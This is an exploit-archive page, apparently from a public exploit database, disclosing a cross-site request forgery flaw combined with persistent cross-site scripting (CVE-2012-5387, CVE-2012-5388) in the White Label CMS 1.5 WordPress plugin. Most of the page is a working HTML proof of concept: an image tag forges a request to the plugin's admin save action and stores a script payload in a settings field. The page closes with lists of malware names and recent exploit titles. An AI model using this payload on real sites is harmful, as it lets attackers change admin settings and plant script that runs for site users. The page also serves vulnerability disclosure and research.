White Label CMS 1.5 Cross Site Request Forgery / Cross Site

Posted on 26 October 2012

# Exploit Title: White Label CMS v 1.5 CSRF w/ persistent XSS
# Date: 21/10/2012
# Exploit Author: pcsjj
# Vendor Homepage: http://www.videousermanuals.com/white-label-cms/
# Version: 1.5
# Software Link: http://plugins.svn.wordpress.org/white-label-cms/branches/
# Downloads: 110,313
# CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)

<html>
<title>White Label CMS CSRF</title>
<body>
<img src='http://[TARGET]/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name="><script>alert("fun")</script><div
"'>
</body>
</html>

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

SimpCMS 0.1 Cross Site Scripting
Poultry Farm Management System 1.0 Shell Upload
Automad 2.0.0-alpha.4 Cross Site Scripting
SolarWinds Platform 2024.1 SR1 Race Condition
Faronics WINSelect Hardcoded Credentials / Bad Permissions / Unhashed Password

Last 20